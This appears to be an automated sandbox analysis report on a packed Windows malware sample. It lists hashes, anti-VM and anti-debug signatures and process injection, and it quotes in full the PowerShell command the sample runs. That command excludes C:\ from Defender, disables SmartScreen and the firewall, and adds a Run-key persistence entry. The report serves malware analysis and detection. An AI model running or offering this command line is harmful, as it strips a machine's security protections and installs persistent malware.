Analysis
- max time kernel: 162s
- max time network: 178s
- platform: windows10-2004_x64
- resource: win10v2004-20220721-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 25-07-2022 17:10
Behavioral task: behavioral1
- Sample: 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
- Resource: win7-20220718-en
Behavioral task: behavioral2
- Sample: 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
- Resource: win10v2004-20220721-en
General
- Target: 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
- Size: 3.5MB
- MD5: 57324b12506033d137a0ad82d2499c81
- SHA1: 6664dda28b289251ab23f16f7955f97978208fa7
- SHA256: 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80
- SHA512: d514ff8dda74f4af8645ab950b3ff6bd4e0a9432b9614a9fef4953a56b2bbd6535556ef9b6129df1099b7c93cafb682ad50db773ea6bc7db48279165b67fe2d1
Malware Config
Signatures
Modifies security service 2 TTPs 1 IoCs
Processes:
- description: Set value (int); ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4"; process: powershell.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
- description: Key opened; ioc: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__; process: 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
- description: Key value queried; ioc: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion; process: 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
- description: Key value queried; ioc: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion; process: 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up the country code configured in the registry, likely a geofence.
Processes:
- description: Key value queried; ioc: \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation; process: 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Processes:
- resource: behavioral2/memory/3920-130-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp; yara_rule: themida
- resource: behavioral2/memory/3920-131-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp; yara_rule: themida
- resource: behavioral2/memory/3920-132-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp; yara_rule: themida
- resource: behavioral2/memory/3920-133-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp; yara_rule: themida
- resource: behavioral2/memory/3920-135-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp; yara_rule: themida
- resource: behavioral2/memory/3920-142-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp; yara_rule: themida
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
- description: Set value (str); ioc: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe"; process: powershell.exe
Checks whether UAC is enabled
Processes:
- description: Key value queried; ioc: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA; process: 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
- pid: 3920; process: 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash 1 IoCs
Processes:
- pid: 1484; pid_target: 3920; process: WerFault.exe; target process: 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
- pid: 3460; process: powershell.exe
- pid: 3920; process: 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
- description: Token: SeDebugPrivilege; pid: 3460; process: powershell.exe
- description: Token: SeBackupPrivilege; pid: 3460; process: powershell.exe
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
- description: PID 3920 wrote to memory of 3460; pid: 3920; process: 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe; target process: powershell.exe
- description: PID 3920 wrote to memory of 3460; pid: 3920; process: 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe; target process: powershell.exe
- description: PID 3460 wrote to memory of 1016; pid: 3460; process: powershell.exe; target process: netsh.exe
- description: PID 3460 wrote to memory of 1016; pid: 3460; process: powershell.exe; target process: netsh.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
    - Modifies security service
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\netsh.exe
      Command line: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
      - Modifies Windows Firewall
  - C:\Windows\system32\WerFault.exe
    Command line: C:\Windows\system32\WerFault.exe -u -p 3920 -s 2004
    - Program crash
- C:\Windows\system32\WerFault.exe
  Command line: C:\Windows\system32\WerFault.exe -pss -s 408 -p 3920 -ip 3920
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/1016-140-0x0000000000000000-mapping.dmp
- memory/3460-137-0x0000000000000000-mapping.dmp
- memory/3460-141-0x00007FFF745E0000-0x00007FFF750A1000-memory.dmp (filesize: 10.8MB)
- memory/3460-139-0x00007FFF745E0000-0x00007FFF750A1000-memory.dmp (filesize: 10.8MB)
- memory/3460-138-0x0000024CB00C0000-0x0000024CB00E2000-memory.dmp (filesize: 136KB)
- memory/3920-133-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp (filesize: 9.4MB)
- memory/3920-136-0x00007FFF92DD0000-0x00007FFF92FC5000-memory.dmp (filesize: 2.0MB)
- memory/3920-135-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp (filesize: 9.4MB)
- memory/3920-134-0x00007FFF92DD0000-0x00007FFF92FC5000-memory.dmp (filesize: 2.0MB)
- memory/3920-130-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp (filesize: 9.4MB)
- memory/3920-132-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp (filesize: 9.4MB)
- memory/3920-131-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp (filesize: 9.4MB)
- memory/3920-142-0x00007FF751DB0000-0x00007FF75270E000-memory.dmp (filesize: 9.4MB)
- memory/3920-143-0x00007FFF92DD0000-0x00007FFF92FC5000-memory.dmp (filesize: 2.0MB)